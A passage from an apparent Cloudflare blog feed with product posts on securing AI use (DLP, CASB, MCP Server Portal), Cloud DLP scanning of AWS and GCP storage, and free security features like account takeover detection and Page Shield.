    <p>You can use <a href="https://developers.cloudflare.com/cloudflare-one/policies/access/"><u>Cloudflare Access</u></a> to control your employees’ access to your organization’s internal LLMs, including any <a href="https://www.cloudflare.com/learning/ai/how-to-secure-training-data-against-ai-data-leaks/">proprietary models you train internally</a> and/or models that your organization runs on <a href="https://developers.cloudflare.com/workers-ai/"><u>Cloudflare Worker’s AI</u></a>. </p><p>Cloudflare Access allows you to gate access to these LLMs using fine-grained policies, including ensuring users are granted access based on their identity, user group, device posture, and other contextual signals. For example, you can use <a href="https://developers.cloudflare.com/cloudflare-one/policies/access/"><u>Cloudflare Access</u></a> to write a policy that ensures that only certain data scientists at your organization can access a <a href="https://developers.cloudflare.com/workers-ai/"><u>Workers AI</u></a> model that is <a href="https://developers.cloudflare.com/workers-ai/guides/tutorials/fine-tune-models-with-autotrain/"><u>trained</u></a> on certain types of customer data. </p>
    <div>
      <h3>Manage the security posture of third-party AI providers</h3>
      <a href="#manage-the-security-posture-of-third-party-ai-providers">
        
      </a>
    </div>
    <p>As you define which AI tools are sanctioned, you can develop functional security controls for consistent usage. Cloudflare newly supports <a href="http://blog.cloudflare.com/casb-ai-integrations/"><u>API CASB integrations with popular AI tools</u></a> like OpenAI (ChatGPT), Anthropic (Claude), and Google Gemini. These "out-of-band" integrations provide immediate visibility into how users are engaging with sanctioned AI tools, allowing you to report on posture management findings include:</p><ul><li><p>Misconfigurations related to sharing settings.</p></li><li><p>Best practices for API key management.</p></li><li><p>DLP profile matches in uploaded attachments</p></li><li><p>Riskier AI features (e.g. autonomous web browsing, code execution) that are toggled on</p></li></ul>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/0a6FVjCwejeyUzdQR0pyb/79f29b0d92c27bcd400ed7ded8d4c4e3/6.png" />
          </figure><p><sup><i>OpenAI API CASB Integration showing riskier features that are toggled on, security posture risks like unused admin credentials, and an uploaded attachment with a DLP profile match.</i></sup></p>
    <div>
      <h2>Layer on data protection </h2>
      <a href="#layer-on-data-protection">
        
      </a>
    </div>
    <p>Robust data protection is the final pillar that protects your employee’s access to AI.. </p>
    <div>
      <h3>Prevent data loss</h3>
      <a href="#prevent-data-loss">
        
      </a>
    </div>
    <p>Our SASE platform has long supported Data Loss Prevention (<a href="https://developers.cloudflare.com/cloudflare-one/policies/data-loss-prevention/"><u>DLP</u></a>) tools that scan and block sensitive data from being entered into AI tools, to prevent data leakage and protect your organization's most valuable information.  You can write policies that detect sensitive data while adapting to <a href="https://blog.cloudflare.com/improving-data-loss-prevention-accuracy-with-ai-context-analysis/"><u>organization-specific traffic patterns</u></a>, and use Cloudflare Gateway’s unified policy builder to apply these to your users' interactions with AI tools or other applications. For example, you could write a DLP policy that detects and blocks the upload of a social security number (SSN), phone number or address.</p><p>As part of our new <a href="http://blog.cloudflare.com/ai-prompt-protection/"><u>AI prompt protection</u></a> feature, you can now also gain a semantic understanding of your users’ interactions with supported AI providers. Prompts are classified <i>inline </i>into meaningful, high-level topics that include PII, credentials and secrets, source code, financial information, code abuse / malicious code and prompt injection / jailbreak.  You can then build inline granular policies based on these high-level topic classifications. For example, you could create a policy that blocks a non-HR employee from submitting a prompt with the intent to receive PII from the response, while allowing the HR team to do so during a compensation planning cycle. </p><p>Our new <a href="http://blog.cloudflare.com/ai-prompt-protection/"><u>AI prompt protection</u></a> feature empowers you to apply smart, user-specific DLP rules that empower your teams to get work done, all while strengthening your security posture. To use our most advanced DLP feature, you'll need to enable TLS decryption to inspect traffic.</p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/3dUnu8P5cMS18k9BxkGoHY/16fdccae7f8e99dc34ebfe7399db4b94/7.png" />
          </figure><p><sup><i>The above policy blocks all ChatGPT prompts that may receive PII back in the response for employees in engineering, marketing, product, and finance </i></sup><a href="https://developers.cloudflare.com/cloudflare-one/policies/gateway/identity-selectors/"><sup><i><u>user groups</u></i></sup></a><sup><i>. </i></sup></p>
    <div>
      <h2>Secure MCP — and Agentic AI </h2>
      <a href="#secure-mcp-and-agentic-ai">
        
      </a>
    </div>
    <p>MCP (Model Context Protocol) is an emerging AI standard, where MCP servers act as a translation layer for <a href="https://www.cloudflare.com/learning/ai/what-is-agentic-ai/"><u>AI agents</u></a>, allowing them to communicate with public and private APIs, understand datasets, and perform actions. Because these servers are a primary entry point for AI agents to engage with and manipulate your data, they are a new and critical security asset for your security team to manage.</p><p>Cloudflare already offers a robust set of developer tools for deploying <a href="https://developers.cloudflare.com/agents/guides/remote-mcp-server/"><u>remote MCP servers</u></a>—a cloud-based server that acts as a bridge between a user's data and tools and various AI applications. But now our customers are asking for help securing their enterprise MCP deployments. </p><p>That is why we’re making MCP security controls a core part of our SASE platform.</p>
    <div>
      <h4>Control MCP Authorization</h4>
      <a href="#control-mcp-authorization">
        
      </a>
    </div>
    <p>MCP servers typically use OAuth for authorization, where the server inherits the permissions of the authorizing user. While this adheres to least-privilege for the user, it can lead to <b>authorization sprawl </b>— where the agent accumulates an excessive number of permissions over time. This makes the agent a high-value target for attackers.</p><p><a href="https://developers.cloudflare.com/cloudflare-one/applications/configure-apps/mcp-servers"><u>Cloudflare Access</u></a> now helps you manage authorization sprawl by applying <a href="https://www.cloudflare.com/learning/security/glossary/what-is-zero-trust/"><u>Zero Trust principles</u></a> to MCP server access. A Zero Trust model assumes no user, device, or network can be trusted implicitly, so every request is continuously verified. This <a href="https://developers.cloudflare.com/cloudflare-one/applications/configure-apps/mcp-servers"><u>approach </u></a>ensures secure authentication and management of these critical assets as your business adopts more agentic workflows. </p>
    <div>
      <h4>Centralize management of MCP servers</h4>
      <a href="#centralize-management-of-mcp-servers">
        
      </a>
    </div>
    <p><a href="http://blog.cloudflare.com/zero-trust-mcp-server-portals/"><u>Cloudflare MCP Server Portal</u></a> is a new feature in Cloudflare’s SASE platform that centralizes the management, security, and observation of an organization’s MCP servers.</p><p>MCP Server Portal allows you to register all your MCP servers with Cloudflare and provide your end users with a single, unified Portal endpoint to configure in their MCP client. This approach simplifies the user experience, because it eliminates the need to configure a one-to-one connection between every MCP client and server. It also means that new MCP servers dynamically become available to users whenever they are added to the Portal. </p><p>Beyond these usability enhancements, MCP Server Portal addresses the significant security risks associated with MCP in the enterprise. The current decentralized approach of MCP deployments creates a tangle of unmanaged one-to-one connections that are difficult to secure. The lack of centralized controls creates a variety of risks including prompt injection, tool injection (where malicious code is part of the MCP server itself), supply chain attacks and data leakage. </p><p>MCP Server Portals solve this by routing all MCP traffic through Cloudflare, allowing for centralized policy enforcement, comprehensive visibility and logging, and a curated user experience based on the principle of least privilege. Administrators can review and approve MCP servers before making them available, and users are only presented with the servers and tools they are authorized to use, which prevents the use of unvetted or malicious third-party servers.</p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/64a5Snga1xwRHeCmdbYrpj/f23dc4584618f0c37fb0be8f3399554b/8.png" />
          </figure><p><sup><i>An MCP Server Portal in the Cloudflare Dashboard</i></sup></p><p>All of these features are only the beginning of our MCP security roadmap, as we continue advancing our support for MCP infrastructure and security controls across the entire Cloudflare platform.</p>
    <div>
      <h2>Implement your AI security strategy in a single platform</h2>
      <a href="#implement-your-ai-security-strategy-in-a-single-platform">
        
      </a>
    </div>
    <p>As organizations rapidly develop and deploy their AI security strategies, Cloudflare’s SASE platform is ideally situated to implement policies that balance productivity with data and security controls.</p><p>Our SASE has a full suite of features to protect employee interactions with AI. Some of these features are deeply integrated in our <a href="https://developers.cloudflare.com/cloudflare-one/policies/gateway/"><u>Secure Web Gateway (SWG)</u></a>, including the ability to write fine-grained access policies, gain visibility into <a href="http://blog.cloudflare.com/shadow-AI-analytics/"><u>Shadow IT </u></a>and introspect on interactions with AI tools using <a href="http://blog.cloudflare.com/ai-prompt-protection/"><u>AI prompt protection</u></a>. Apart from these inline controls, our <a href="https://developers.cloudflare.com/cloudflare-one/applications/casb/"><u>CASB</u></a> provides visibility and control using out-of-band API integrations. Our Cloudflare <a href="https://developers.cloudflare.com/cloudflare-one/policies/access/"><u>Access</u></a> product can apply Zero Trust principles while protecting employee access to corporate LLMs that are hosted on <a href="https://developers.cloudflare.com/workers-ai/"><u>Workers AI</u></a> or elsewhere. We’re newly integrating controls for <a href="http://blog.cloudflare.com/zero-trust-mcp-server-portals/"><u>securing MCP</u></a> that can also be used alongside Cloudflare’s <a href="https://blog.cloudflare.com/remote-model-context-protocol-servers-mcp/"><u>Remote MCP Server</u></a> platform.</p><p>And all of these features are integrated directly into Cloudflare’s SASE’s unified dashboard, providing a unified platform for you to implement your AI security strategy. You can even gain a holistic view of all of your AI-SPM controls using our newly-released AI-SPM overview dashboard. </p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/6WzeNXp9TbX0h0QF8Nyby5/bcbeb8824e3eb5558826aed2cb17c11a/9.png" />
          </figure><p><sup><i>AI security report showing utilization of AI applications.</i></sup></p><p>As one the few SASE vendors that also offer AI infrastructure, Cloudflare’s SASE platform can also be deployed alongside products from our developer and application security platforms to holistically implement your AI security strategy alongside your AI infrastructure strategy (using, for example, <a href="https://developers.cloudflare.com/workers-ai/"><u>Workers AI</u></a>, <a href="https://developers.cloudflare.com/ai-gateway/"><u>AI Gateway</u></a>, <a href="https://developers.cloudflare.com/agents/guides/remote-mcp-server/"><u>remote MCP servers</u></a>, <a href="https://realtime.cloudflare.com/"><u>Realtime AI Apps</u></a>, <a href="https://developers.cloudflare.com/waf/detections/firewall-for-ai/"><u>Firewall for AI</u></a>, <a href="https://blog.cloudflare.com/ai-labyrinth/"><u>AI Labyrinth</u></a>, or <a href="https://blog.cloudflare.com/introducing-pay-per-crawl/"><u>pay per crawl</u></a> .)</p>
    <div>
      <h2>Cloudflare is committed to helping enterprises securely adopt AI</h2>
      <a href="#cloudflare-is-committed-to-helping-enterprises-securely-adopt-ai">
        
      </a>
    </div>
    <p>Ensuring AI is scalable, safe, and secure is a natural extension of Cloudflare’s mission, given so much of our success relies on a safe Internet. As AI adoption continues to accelerate, so too does our mission to provide a market-leading set of controls for AI Security Posture Management (AI-SPM). Learn more about how <a href="https://developers.cloudflare.com/learning-paths/holistic-ai-security/concepts/"><u>Cloudflare helps secure AI</u></a> or start exploring our new AI-SPM features in Cloudflare’s SASE <a href="https://dash.cloudflare.com/"><u>dashboard </u></a>today!</p> ]]></content:encoded>
            <category><![CDATA[AI Week]]></category>
            <category><![CDATA[Cloudflare One]]></category>
            <category><![CDATA[Cloudflare Zero Trust]]></category>
            <category><![CDATA[SASE]]></category>
            <category><![CDATA[AI]]></category>
            <category><![CDATA[AI-SPM]]></category>
            <category><![CDATA[DLP]]></category>
            <category><![CDATA[CASB]]></category>
            <category><![CDATA[Access]]></category>
            <category><![CDATA[MCP]]></category>
            <guid isPermaLink="false">55IAKy7DMqbZKAy8htcUiO</guid>
            <dc:creator>AJ Gerstenhaber</dc:creator>
            <dc:creator>Sharon Goldberg</dc:creator>
            <dc:creator>Corey Mahan</dc:creator>
            <dc:creator>Yumna Moazzam</dc:creator>
        </item>
        <item>
            <title><![CDATA[Detecting sensitive data and misconfigurations in AWS and GCP with Cloudflare One]]></title>
            <link>https://blog.cloudflare.com/scan-cloud-dlp-with-casb/</link>
            <pubDate>Fri, 21 Mar 2025 13:10:00 GMT</pubDate>
            <description><![CDATA[ Using Cloudflare’s CASB, integrate, scan, and detect sensitive data and misconfigurations in your cloud storage accounts. ]]></description>
            <content:encoded><![CDATA[ <p>Today is the final day of Security Week 2025, and after a great week of blog posts across a variety of topics, we’re excited to share the latest on Cloudflare’s data security products.</p><p>This announcement takes us to Cloudflare’s SASE platform, <a href="https://www.cloudflare.com/zero-trust/products/"><u>Cloudflare One</u></a>, used by enterprise security and IT teams to manage the security of their employees, applications, and third-party tools, all in one place.</p><p>Starting today, Cloudflare One users can now use the <a href="https://www.cloudflare.com/zero-trust/products/casb/"><u>CASB</u></a> (Cloud Access Security Broker) product to integrate with and scan Amazon Web Services (AWS) S3 and Google Cloud Storage, for posture- and Data Loss Prevention (DLP)-related security issues. <a href="https://dash.cloudflare.com/sign-up"><u>Create a free account</u></a> to check it out.</p><p>Scanning both point-in-time and continuously, users can identify misconfigurations in Identity and Access Management (IAM), bucket, and object settings, and detect sensitive information, like Social Security numbers, credit card numbers, or any other pattern using regex, in cloud storage objects.</p>
    <div>
      <h3>Cloud DLP</h3>
      <a href="#cloud-dlp">
        
      </a>
    </div>
    
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/1R1bE9TRmTdHDTg1XeLS60/8269b687ec65e70bcaee437f30d5f590/1.png" />
          </figure><p>Over the last few years, our customers — predominantly security and IT teams — have told us about their appreciation for CASB’s simplicity and effectiveness as a SaaS security product. Its number of <a href="https://developers.cloudflare.com/cloudflare-one/applications/casb/casb-integrations/"><u>supported integrations</u></a>, its ease of setup, and speed in identifying critical issues across popular SaaS platforms, like files shared publicly in Microsoft 365 and exposed sensitive data in Google Workspace, has made it a go-to for many.</p><p>However, as we’ve engaged with customers, one thing became clear: the risks of unmonitored or exposed data at-rest go far beyond just SaaS environments. Sensitive information – whether intellectual property, customer data, or personal identifiers – can wreak havoc on an organization’s reputation and its obligations to its customers if it falls into the wrong hands. For many of our customers, the security of data stored in cloud providers like AWS and GCP is even more critical than the security of data in their SaaS tools.</p><p>That’s why we’ve extended Cloudflare CASB to include <a href="https://developers.cloudflare.com/cloudflare-one/policies/data-loss-prevention/"><u>Cloud DLP (Data Loss Prevention)</u></a> functionality, enabling users to scan objects in Amazon S3 buckets and Google Cloud Storage for sensitive data matches​.</p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/5TKXiAkQKxw3GFQBCuQLjX/198e4620da8239280eff669b7b62678b/2.png" />
          </figure><p>With <a href="https://www.cloudflare.com/zero-trust/products/dlp/"><u>Cloudflare DLP</u></a>, you can choose from pre-built detection profiles that look for common data types (such as Social Security Numbers or credit card numbers) or create your own custom profiles using regular expressions​. As soon as an object matching a DLP profile is detected, you can dive into the details, understanding the file’s context, seeing who owns it, and more. These capabilities provide the insight needed to quickly protect data and prevent exposure in real time.</p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/4cyOaQJ0ZyPO8r7LyeU6ON/30b8453888d6cb13dcb15225f875a0cd/3.png" />
          </figure><p>And as with all CASB integrations, this new functionality also comes with <a href="https://www.cloudflare.com/learning/cloud/what-is-dspm/">posture management features</a>, meaning whether you’re using AWS or GCP, we’ll help you identify misconfigurations and other cloud security issues that could leave your data vulnerable​, like buckets that are publicly-accessible or have critical logging settings disabled, access keys needing rotation, or users without <a href="https://www.cloudflare.com/learning/access-management/what-is-multi-factor-authentication/"><u>multi-factor authentication (MFA)</u></a>. It’s all included.</p>
    <div>
      <h3>Simple by default, configurable where you want it</h3>
      <a href="#simple-by-default-configurable-where-you-want-it">
        
      </a>
    </div>
    <p>Cloudflare CASB and DLP are simple to use by default, making it easy to get started right away. But it’s also highly configurable, giving you the flexibility to fine-tune the scanning profiles to suit your specific needs.</p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/5MLh3y7SMHnX52cjuu4pmE/b7bb67497fc21bc9d3f3f740a9b3fe52/4.png" />
          </figure><p>For example, you can adjust which storage buckets or file types to scan, and even sample only a percentage of objects for analysis​. The scanning also runs within your own cloud environment, so your data never leaves your infrastructure​. This approach keeps your cloud storage secure and your costs managed while allowing you to tailor the solution to your organization’s unique compliance and security requirements.</p><p>Looking ahead, our roadmap also includes expanding support to additional cloud storage environments, such as Azure Blob Storage and Cloudflare R2, further extending our comprehensive, multi-cloud security strategy. Stay tuned for more on that!</p>
    <div>
      <h3>How it works</h3>
      <a href="#how-it-works">
        
      </a>
    </div>
    <p>From the start, we knew that to deliver DLP capabilities across cloud environments, it would require an efficient and scalable design to enable real-time detection of sensitive data exposure.</p>
    <div>
      <h4>Serverless architecture for streamlined processing</h4>
      <a href="#serverless-architecture-for-streamlined-processing">
        
      </a>
    </div>
    <p>An early design decision was made to leverage a serverless architecture approach to ensure sensitive data discovery is both efficient and scalable. Here’s how it works:</p><ul><li><p><b>Compute Account</b>: The entire process runs within a cloud account owned by your organization, known as a Compute Account. This design ensures your data remains within your boundaries, avoiding costly cloud egress fees. The Compute Account can be launched in under 15 minutes using a provided Terraform template.</p></li><li><p><b>Controller function</b>: Every minute, a lightweight, serverless controller function in your cloud environment communicates with Cloudflare’s APIs, fetching the latest DLP configurations and security profiles from your Cloudflare One account.</p></li><li><p><b>Crawler process</b>: The controller triggers an object discovery task, which is processed by a second serverless function known as the Crawler. The Crawler queries cloud storage accounts, like AWS S3 or Google Cloud Storage, via API to identify new objects. Redis is used within the Compute Account to track which objects have yet to be evaluated.</p></li><li><p><b>Scanning for sensitive data</b>: Newly discovered objects are sent through a queue to a third serverless function called the Scanner. This function downloads the objects and streams their contents to the DLP engine in the Compute Account, which scans for matches against predefined or custom DLP Profiles.</p></li><li><p><b>Finding generation and alerts</b>: If a DLP match is found, metadata about the object, such as context and ownership details, is published to a queue. This data is ingested by a Cloudflare-hosted service and presented in the Cloudflare Dashboard as findings, giving security teams the visibility needed to take swift action.</p></li></ul>
    <div>
      <h4>Scalable and secure design</h4>
      <a href="#scalable-and-secure-design">
        
      </a>
    </div>
    <p>The DLP pipeline ensures that sensitive data never leaves your cloud environment — a privacy-first approach. All communication between the Compute Account and Cloudflare's APIs are initiated by the controller, also meaning there is no need to perform any extra configuration to allow ingress traffic.</p>
    <div>
      <h3>How to get started</h3>
      <a href="#how-to-get-started">
        
      </a>
    </div>
    <p>To get started, reach out to your account team to learn more about this new data security functionality and our roadmap. If you want to try this out on your own, you can login to the Cloudflare One dashboard (create a free account <a href="https://www.cloudflare.com/zero-trust/products/"><u>here</u></a> if you don’t have one) and navigate to the CASB page to set up your first integration.</p>
    <div>
      <h3>Watch on Cloudflare TV</h3>
      <a href="#watch-on-cloudflare-tv">
        
      </a>
    </div>
    <div>
  
</div><p></p> ]]></content:encoded>
            <category><![CDATA[Security Week]]></category>
            <category><![CDATA[Cloudflare One]]></category>
            <category><![CDATA[CASB]]></category>
            <category><![CDATA[DLP]]></category>
            <category><![CDATA[AWS]]></category>
            <category><![CDATA[Google Cloud]]></category>
            <category><![CDATA[Zero Trust]]></category>
            <guid isPermaLink="false">2hlOlV28pXRFpnmnkqbbhw</guid>
            <dc:creator>Alex Dunbrack</dc:creator>
            <dc:creator>Michael Leslie </dc:creator>
        </item>
        <item>
            <title><![CDATA[A safer Internet with Cloudflare: free threat intelligence, analytics, and new threat detections]]></title>
            <link>https://blog.cloudflare.com/a-safer-internet-with-cloudflare/</link>
            <pubDate>Tue, 24 Sep 2024 13:00:00 GMT</pubDate>
            <description><![CDATA[ Today, we are taking some big steps forward in our mission to help build a better Internet. Cloudflare is giving everyone free access to 10+ different website and network security products and features. ]]></description>
            <content:encoded><![CDATA[ <p>Anyone using the Internet likely touches Cloudflare’s network on a daily basis, either by accessing a site protected by Cloudflare, using our <a href="https://1.1.1.1/dns"><u>1.1.1.1 resolver</u></a>, or connecting via a network using our Cloudflare One products.</p><p>This puts Cloudflare in a position of great responsibility to make the Internet safer for billions of users worldwide. Today we are providing threat intelligence and more than 10 new security features for free to all of our customers. Whether you are using Cloudflare to <a href="https://www.cloudflare.com/learning/security/glossary/website-security-checklist/">protect your website</a>, your home network, or your office, you will find something useful that you can start using with just a few clicks.</p><p>These features are focused around some of the largest growing concerns in cybersecurity, including <a href="https://www.cloudflare.com/zero-trust/solutions/account-takeover-prevention/"><u>account takeover attacks</u></a>, <a href="https://blog.cloudflare.com/tag/supply-chain-attacks/"><u>supply chain attacks</u></a>, <a href="https://www.cloudflare.com/learning/security/api/what-is-api-security/"><u>attacks against API endpoints</u></a>, <a href="https://www.cloudflare.com/network-services/products/magic-network-monitoring/"><u>network visibility</u></a>, and <a href="https://www.cloudflare.com/learning/access-management/what-is-dlp/"><u>data leaks from your network</u></a>.</p>
    <div>
      <h2>More security for everyone</h2>
      <a href="#more-security-for-everyone">
        
      </a>
    </div>
    <p>You can read more about each one of these features in the sections below, but we wanted to provide a short summary upfront.</p><p><b>If you are a cyber security enthusiast: </b>you can head over to our <a href="http://cloudflare.com/threat-intelligence/"><u>new Cloudforce One threat intelligence website</u></a> to find out about threat actors, attack campaigns, and other Internet-wide security issues.</p><p><b>If you are a website owner</b>: starting today, all free plans will get access to <a href="https://developers.cloudflare.com/waf/analytics/security-analytics/"><u>Security Analytics</u></a> for their zones. Additionally, we are also making <a href="https://developers.cloudflare.com/dns/additional-options/analytics/"><u>DNS Analytics</u></a> available to everyone via GraphQL.</p><p>Once you have visibility, it’s all about distinguishing good from malicious traffic. All customers get access to always-on <a href="https://developers.cloudflare.com/waf/managed-rules/check-for-exposed-credentials/"><u>account takeover attack detection</u></a>, <a href="https://developers.cloudflare.com/api-shield/security/schema-validation/"><u>API schema validation</u></a> to enforce a positive security model on their API endpoints, and <a href="https://developers.cloudflare.com/page-shield/detection/monitor-connections-scripts/"><u>Page Shield script monitor</u></a> to provide visibility into the third party assets that you are loading from your side and that could be used to perform supply chain-based attacks.</p><p><b>If you are using Cloudflare to protect your people and network</b>: We are going to bundle a number of our Cloudflare One products into a new free offering. This bundle will include the current <a href="https://www.cloudflare.com/plans/zero-trust-services/"><u>Zero Trust products we offer for free</u></a>, and new products like <a href="https://www.cloudflare.com/network-services/products/magic-network-monitoring/"><u>Magic Network Monitoring</u></a> for network visibility, <a href="https://www.cloudflare.com/learning/access-management/what-is-dlp/"><u>Data Loss Prevention</u></a> for sensitive data, and <a href="https://www.cloudflare.com/learning/performance/what-is-digital-experience-monitoring/"><u>Digital Experience Monitoring</u></a> for measuring network connectivity and performance. Cloudflare is the only vendor to offer free versions of these types of products.</p><p><b>If you are a new user: </b>We have new options for authentication. Starting today, we are introducing the option to use Google Authentication to sign up and log into Cloudflare, which will make it easier for some of our customers to login, and reduce dependence on remembering passwords, consequently reducing the risk of their Cloudflare account becoming compromised.</p><p>And now in more detail:</p>
    <div>
      <h2>Threat Intelligence &amp; Analytics</h2>
      <a href="#threat-intelligence-analytics">
        
      </a>
    </div>
    
    <div>
      <h3>Cloudforce One</h3>
      <a href="#cloudforce-one">
        
      </a>
    </div>
    <p>Our threat research and operations team, <a href="https://blog.cloudflare.com/introducing-cloudforce-one-threat-operations-and-threat-research/"><u>Cloudforce One</u></a>, is excited to announce the launch of a <a href="http://cloudflare.com/threat-intelligence/"><u>freely accessible dedicated threat intelligence website</u></a>. We will use this site to publish both technical and executive-oriented information on the latest threat actor activity and tactics, as well as insights on emerging malware, vulnerabilities, and attacks.</p><p>We are also publishing two new pieces of threat intelligence, along with a promise for more. Head over to the <a href="http://cloudflare.com/threat-intelligence/"><u>new website</u></a> here to see the latest research, covering an advanced threat actor targeting regional organizations across South and East Asia, as well as the rise of double brokering freight fraud. Future research and data sets will also become available as a new<a href="https://developers.cloudflare.com/security-center/indicator-feeds/"> <u>Custom Indicator Feed</u></a><u> </u>for customers.</p><p><a href="http://cloudflare.com/threat-intelligence/"><u>Subscribe</u></a> to receive email notifications of future threat research.</p>
    <div>
      <h3>Security Analytics</h3>
      <a href="#security-analytics">
        
      </a>
    </div>
    <p>Security Analytics gives you a security lens across <b>all</b> of your HTTP traffic, not only mitigated requests, allowing you to focus on what matters most: traffic deemed malicious but potentially not mitigated. This means that, in addition to using Security Events to view security actions taken by our Application Security suite of products, you can use Security Analytics to review all of your traffic for anomalies or strange behavior and then use the insights gained to craft precise mitigation rules based on your specific traffic patterns. Starting today, we are making this lens available to customers across all plans.</p><p>Free and Pro plan users will now have access to <a href="https://dash.cloudflare.com/?to=/:account/:zone/security/analytics"><u>a new dashboard</u></a> for Security Analytics where you can view a high level overview of your traffic in the Traffic Analysis chart, including the ability to group and filter so that you can zero in on anomalies with ease. You can also see top statistics and filter across a variety of dimensions, including countries, source browsers, source operating systems, HTTP versions, SSL protocol version, cache status, and security actions.</p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/7oBM7D78NDErNNgIPRSJN9/055440bfd256bb2f128d5d99858a5748/image6.jpg" />
          </figure>
    <div>
      <h3>DNS Analytics</h3>
      <a href="#dns-analytics">
        
      </a>
    </div>
    <p>Every user on Cloudflare now has access to <a href="https://dash.cloudflare.com/?to=/:account/:zone/dns/analytics"><u>the new and improved DNS Analytics dashboard</u></a> as well as access to the new DNS Analytics dataset in our <a href="https://developers.cloudflare.com/analytics/graphql-api/"><u>powerful GraphQL API</u></a>. Now, you can easily analyze the DNS queries to your domain(s), which can be useful for troubleshooting issues, detecting patterns and trends, or generating usage reports by applying powerful filters and breaking out DNS queries by source.</p><p>With the <a href="https://blog.cloudflare.com/foundation-dns-launch"><u>launch of Foundation DNS</u></a>, we introduced new DNS Analytics based on GraphQL, but these analytics were previously only available for zones using <a href="https://developers.cloudflare.com/dns/foundation-dns/advanced-nameservers/"><u>advanced nameservers</u></a>. However, due to the deep insight these analytics provide, we felt this feature was something we should make available to everyone. Starting today, the new DNS Analytics based on GraphQL can be accessed on every zone using Cloudflare’s Authoritative DNS service under Analytics in the DNS section.</p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/3LJ4aIFB4pHhHtWeWzYlgV/96c701d7c826a92e1220c7cd85f40f88/image5.png" />
          </figure>
    <div>
      <h2>Application threat detection and mitigation</h2>
      <a href="#application-threat-detection-and-mitigation">
        
      </a>
    </div>
    
    <div>
      <h3>Account takeover detection</h3>
      <a href="#account-takeover-detection">
        
      </a>
    </div>
    <p><a href="https://techreport.com/statistics/cybersecurity/password-reuse-statistics/"><u>65% of Internet users</u></a> are vulnerable to account takeover (ATO) due to password reuse and the rising frequency of large data breaches. Helping build a better Internet involves making critical account protection easy and accessible for everyone.</p><p>Starting today, we’re providing robust account security that helps prevent credential stuffing and other ATO attacks to everyone for free — from individual users to large enterprises — making enhanced features like Leaked Credential Checks and ATO detections available at no cost. </p><p>These updates include automatic detection of logins, brute force attack prevention with minimal setup, and access to a comprehensive leaked credentials database of over 15 billion passwords which will contain leaked passwords from the <a href="https://haveibeenpwned.com/"><u>Have I been Pwned (HIBP)</u></a> service in addition to our own database. Customers can take action on the leaked credential requests through Cloudflare’s WAF features like <a href="https://developers.cloudflare.com/waf/rate-limiting-rules"><u>Rate Limiting Rules</u></a> and <a href="https://developers.cloudflare.com/waf/custom-rules/"><u>Custom Rules</u></a>, or they can take action at the origin by enforcing <a href="https://www.cloudflare.com/learning/access-management/what-is-multi-factor-authentication/"><u>multi-factor authentication (MFA)</u></a> or requiring a password reset based on a header sent to the origin.</p><p>Setup is simple: Free plan users get automatic detections, while paid users can activate the new features via one click in the Cloudflare dashboard. For more details on setup and configuration, refer to our <a href="https://developers.cloudflare.com/waf/detections/leaked-credentials/"><u>documentation</u></a> and use it today!</p>
    <div>
      <h3>API schema validation</h3>
      <a href="#api-schema-validation">
        
      </a>
    </div>
    <p>API traffic <a href="https://www.cloudflare.com/2024-api-security-management-report/"><u>comprises more than half</u></a> of the dynamic traffic on the Cloudflare network. The popularity of APIs has opened up a whole new <a href="https://cyware.com/news/unprotected-database-belonging-to-justdial-exposes-personal-information-of-almost-100-million-users-1d5bb7a9"><u>set</u></a> of <a href="https://venturebeat.com/security/t-mobile-data-breach-shows-api-security-cant-be-ignored/"><u>attack</u></a> <a href="https://venturebeat.com/security/twitter-breach-api-attack/"><u>vectors</u></a>. Cloudflare API Shield’s <a href="https://developers.cloudflare.com/api-shield/security/schema-validation/"><u>Schema Validation</u></a> is the first step to <a href="https://blog.cloudflare.com/api-gateway/"><u>strengthen</u></a> your API security in the face of these new threats.</p><p>Now for the first time, <i>any</i> Cloudflare customer can use Schema Validation to ensure only valid requests to their API make it through to their origin.</p><p>This functionality stops accidental information disclosure due to bugs, stops developers from haphazardly exposing endpoints through a non-standard process, and automatically blocks zombie APIs as your API inventory is kept up-to-date as part of your <a href="https://www.cloudflare.com/learning/serverless/glossary/what-is-ci-cd/">CI/CD process</a>.</p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/3PMaRYLTwff6D7sdXRysJ7/728deb51cbec996c6741c428639b6900/image2.png" />
          </figure><p>We suggest you use Cloudflare’s <a href="https://developers.cloudflare.com/api/operations/api-shield-schema-validation-post-schema"><u>API</u></a> or Terraform <a href="https://developers.cloudflare.com/api-shield/reference/terraform/"><u>provider</u></a> to add endpoints to Cloudflare API Shield and update the schema after your code’s been released as part of your post-build CI/CD process. That way, API Shield becomes a go-to API inventory tool, and <a href="https://developers.cloudflare.com/api-shield/security/schema-validation/"><u>Schema Validation</u></a> will take care of requests towards your API that you aren’t expecting.</p><p>While APIs are all about integrating with third parties, sometimes integrations are done by loading libraries directly into your application. Next up, we’re helping secure more of the web by protecting users from malicious third party scripts that steal sensitive information from inputs on your pages.</p>
    <div>
      <h3>Supply chain attack prevention</h3>
      <a href="#supply-chain-attack-prevention">
        
      </a>
    </div>
    <p>Modern web apps improve their users’ experiences and cut down on developer time through the use of third party JavaScript libraries. Because of its privileged access level to everything on the page, a compromised third party JavaScript library can surreptitiously <a href="https://www.cloudflare.com/learning/security/what-is-data-exfiltration/">exfiltrate sensitive information</a> to an attacker without the end user or site administrator realizing it’s happened.</p><p>To counter this threat, we introduced Page Shield <a href="https://blog.cloudflare.com/introducing-page-shield/"><u>three years ago</u></a>. We are now releasing Page Shield’s Script Monitor for free to all our users.</p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/5b6sxHcCLgIAHfb6Qub6NR/ae2f22ed1d2126804a5bc6e333d64fed/image3.png" />
